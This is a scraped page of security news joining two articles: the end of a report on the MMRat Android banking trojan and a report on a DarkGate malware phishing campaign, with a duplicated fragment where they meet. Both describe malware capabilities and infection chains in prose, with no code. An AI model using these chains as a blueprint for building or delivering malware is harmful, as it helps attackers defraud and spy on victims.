According to Trend Micro’s blog post, MMRat can collect extensive device and personal data such as screen and battery data such as whether the screen is locked and current activities, installed apps, contact lists, and network data, e.g., signal strength and network type.

The Android trojan also schedules a time task to collect data at regular intervals. This timer executes every second, and the counter resets every 60 seconds. It looks for victims’ contact lists and installed app info to get maximum personal details. 

After obtaining Accessibility permission, it can obtain extended permission and modify device settings by bypassing user intervention. It is also interested in lock screen patterns, which it collects when the victim unlocks the device and sends it to the C2 server so that the malware operator can unlock the device when desired.

What’s worse, it captures real-time screen content and streams it to a remote server via the MediaProjection API. MMRat also uses the “user terminal state” approach for capturing screen data, in which it doesn’t record the screen as a video but dumps the child nodes in Windows every second.

**How to Stay Protected?**

Users must download apps from trusted platforms like Google Play Store or Apple App Store and avoid suspicious websites posing as app stores. It is equally important to keep updating device software to mitigate security threats like MMRat. Lastly, be very careful when granting Accessibility permissions to an app.

**RELATED ARTICLES**

1.  WhatsApp Pink is malware spreading through group chats
2.  Android apps on APKPure store caught spreading malware
3.  Fake reviews & third-party apps cause 50% of Android threats

New MMRat Android Trojan Uses Fake App Stores for Bank Fraud

A new malspam campaign has been observed deploying an off-the-shelf malware called DarkGate.
"The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates," Telekom Security said in a report published last week.
The latest findings build on recent findings from security

A new malspam campaign has been observed deploying an off-the-shelf malware called **DarkGate**.

"The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates," Telekom Security said in a report published last week.

The latest findings build on recent findings from security researcher Igal Lytzki, who detailed a "high volume campaign" that leverages hijacked email threads to trick recipients into downloading the malware.

The attack commences with a phishing URL that, when clicked, passes through a traffic direction system (TDS) to take the victim to an MSI payload subject to certain conditions. This includes the presence of a refresh header in the HTTP response.

Opening the MSI file triggers a multi-stage process that incorporates an AutoIt script to execute shellcode that acts as a conduit to decrypt and launch DarkGate via a crypter (or loader).

Specifically, the loader is designed to parse the AutoIt script and extract the encrypted malware sample.

An alternate variation of the attacks have been observed using a Visual Basic Script in place of an MSI file, which, in turn, uses cURL to retrieve the AutoIt executable and script file. The exact method by which the VB Script is delivered is currently unknown.

DarkGate, sold mainly on underground forums by an actor named RastaFarEye, comes with capabilities to evade detection by security software, set up persistence using Windows Registry changes, escalate privileges, and steal data from web browsers and other software such as Discord and FileZilla.

It also establishes contact with a command-and-control (C2) server for enumerating files, data exfiltration, launching cryptocurrency miners, and remotely capturing screenshots as well as running other commands.

The malware is offered as a subscription that starts from $1,000 per day to $15,000 per month to $100,000 a year, with the author advertising it as the "ultimate tool for pentesters/redteamers" and that it has "features that you won't find anywhere." Interestingly, earlier versions of DarkGate also came fitted with a ransomware module.

Phishing attacks are a primary delivery pathway for stealers, trojans, and malware loaders such as KrakenKeylogger, QakBot, Raccoon Stealer, SmokeLoader, and others, with threat actors continuously adding new features and enhancements to expand their functionalities.

According to a recent report published by HP Wolf Security, email remained the top vector for delivering malware to endpoints, accounting for 79% of threats identified in Q2 2023.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows